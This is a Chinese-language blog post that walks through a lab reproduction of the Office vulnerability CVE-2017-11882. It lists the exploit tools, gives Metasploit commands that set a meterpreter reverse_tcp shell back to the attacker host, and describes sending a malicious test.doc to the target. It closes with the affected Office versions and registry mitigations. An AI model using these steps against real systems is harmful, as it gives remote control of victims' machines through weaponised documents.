设置背景图片
模块透明度调整:
CVE-2017-11882漏洞复现和利用
首页 > 渗透测试 作者:H0rk4 2018年4月7日 热度:229 字号: 评论: 0 百度未收录
时间:2018-4-7 18:36 热度:229°  评论:0 条 

0×01前言
2017年11月14日微软发布了潜伏17年之久的office远程代码执行漏洞(cve-2017-11882)。该漏洞为office内存破坏漏洞,影响目前流行的office版本。

0×02 漏洞复现
测试环境:win10+kali+office 2016

Win10ip:192.168.8.100(靶机)

Kaliip:192.168.183.128(攻击机)

所需工具如下:

(1)  Command43b_CVE-2017-11882.py:生成攻击doc的python脚本

(2)  PS_shell.rb:msf的攻击模块文件

1.Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以

2.我把PS_shell.rb和ms17-010.rb放置一起了。

文件路径是/usr/share/metasploit-framework/modules/exploits/windows/smb/PS_shell.rb

点击查看原图


通过msf的ps_shell模块 漏洞复现(win10)

1.   启动msf

msfconsole
点击查看原图

2.   查找对应的模块命令:search PS_shell

点击查看原图

3.   利用msf生成利用的脚本

use exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.183.128(攻击机的ip)

set uripath abc

exploit

点击查看原图

点击查看原图

4.   接下来打开一个新的控制台窗口,找到Command43b_CVE-2017-11882.py的路径,

输入命令:
点击查看原图

然后会在同目录生成 test.doc 文件,然后将这个test.doc文件发送到靶机的电脑上,打开这个test.doc文件,

切换回Kali,说明已成功建立连接。

点击查看原图

5.   然后在msf里输入sessions查看一下

(靶机需关杀软,亲测360安全卫士、金山毒霸、电脑管家都会拦截)

点击查看原图

6.   切换进入seiiions –i 1

点击查看原图

这个时候就已经入侵到靶机了。


点击查看原图

点击查看原图
0×03 漏洞影响

MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

0×04 漏洞修复建议

临时解决方案:

不能及时更新安全补丁的用户,用户可以在命令提示符下运行以下命令, 在 Windows 注册表中禁用该组件:

regadd"HKLM\SOFTWARE\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}"/v"Compatibility Flags" /t REG_DWORD /d 0x400

对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令:

regadd"HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM  Compatibility\{0002CE02-0000-0000-C000-000000000046}"/v"Compatibility Flags" /t REG_DWORD /d 0x400

此外, 用户还应启用MicrosoftOffice 沙箱等以防止活动内容执行 (OLE/ActiveX/Macro)。

正文到此结束

热门推荐

二维码加载中...
版权声明:若无特殊注明,本文皆为《 H0rk4 》原创,转载请保留文章出处。
本文链接:CVE-2017-11882漏洞复现和利用 http://www.8ohk.com/?post=88

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗


既然没有吐槽,那就赶紧抢沙发吧!


本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除  

Copyright © 2017-2019  H0rk4's Blog - 致力关注于黑客技术、渗透测试、网络信息安全、1980黑客团队   站长: H0rk4  主题1980黑客团队   H0rk4